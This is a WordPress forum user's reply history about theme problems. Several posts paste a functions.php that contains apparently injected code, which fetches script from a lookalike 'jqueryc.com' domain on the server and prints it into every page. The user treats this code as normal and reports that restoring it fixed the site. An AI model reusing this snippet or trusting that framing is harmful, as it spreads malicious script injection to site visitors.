bmwhealon
Forum Replies Created
-
Forum: Themes and Templates
In reply to: [Parabola] Remove "Subscribe to Blog Via Email"That is where it was! I can’t believe I didn’t catch that before. Thanks!
Forum: Themes and Templates
In reply to: [Parabola] Remove "Subscribe to Blog Via Email"I do believe it is a footer. When I checked “hide footer” on the presentation page settings, the subscribe via email box disappeared. It was also at the bottom of all my pages when I had the twenty eleven theme and I could not figure out how to get rid of it then either. I just installed this Parabola theme today and the subscribe box is still there.
Forum: Themes and Templates
In reply to: Server Not Found@zchristos:
I tried that and it didnt work. No matter what I do when click update file, I still get a blank screen. I am pretty much at a standstill as I cannot navigate anywhere else because any page associated with my site is now blankForum: Themes and Templates
In reply to: Server Not Found@esmi: themeforest
Forum: Themes and Templates
In reply to: Server Not FoundI’m not sure. I had someone else make the site and I just manage it. When it started redirecting today I just followed instructions on this and other forums. It started working for an hour and then stopped. then I deleted a code, pressed submit, got a blank screen, went back and reinserted code and still got a blank screen. But the code is the exact same as it was beforehand when the wpadmin page was still working.
Forum: Themes and Templates
In reply to: Server Not FoundHeres my formatted code again and BTW I am using the Empire theme
<?php if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url=https://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');} function uw_session_start(){ session_start(); } add_action( 'init', 'uw_session_start' ); // INCLUDE MY FRAMEWORK require_once(TEMPLATEPATH . "/framework/theme.php"); ?>
Forum: Themes and Templates
In reply to: Server Not FoundMy site began redirecting again so I tried removing the code from functions. When I did that, the whole page turned white and i couldn’t do anything at all. I had to go back on the browser for the editor page to show up again. I reinserted the code so it reads exactly the same as it was. I clicked submit and it still turned the whole page white. Now no matter where I try to go everything is just white. I am scared to close out of the window because I cant log back on to wp-admin because it will just take me to a white page. My site is ncsucottonfirst.com. Please help!
This is what my function page says
<?php if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url=”https://www.jqueryc.com/jquery-1.6.3.min.js”;$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}function uw_session_start(){
session_start();
}add_action( ‘init’, ‘uw_session_start’ );
// INCLUDE MY FRAMEWORK
require_once(TEMPLATEPATH . “/framework/theme.php”);?>
Forum: Themes and Templates
In reply to: Server Not FoundMy site was doing the same thing today. It was redirecting to www1. I’m using the Empire theme
In the template function editor, I replaced
$url = “https://www.jqueryc.com/jquery-1.6.3.min.js”;
with
$src = “https://ajax.googleapis.com/ajax/libs/jquery/1.6.3/jquery.min.js”;
and got nothing but i reverted it back to what it was
$url = “https://www.jqueryc.com/jquery-1.6.3.min.js”;
and my site started working again. I don’t know why but it did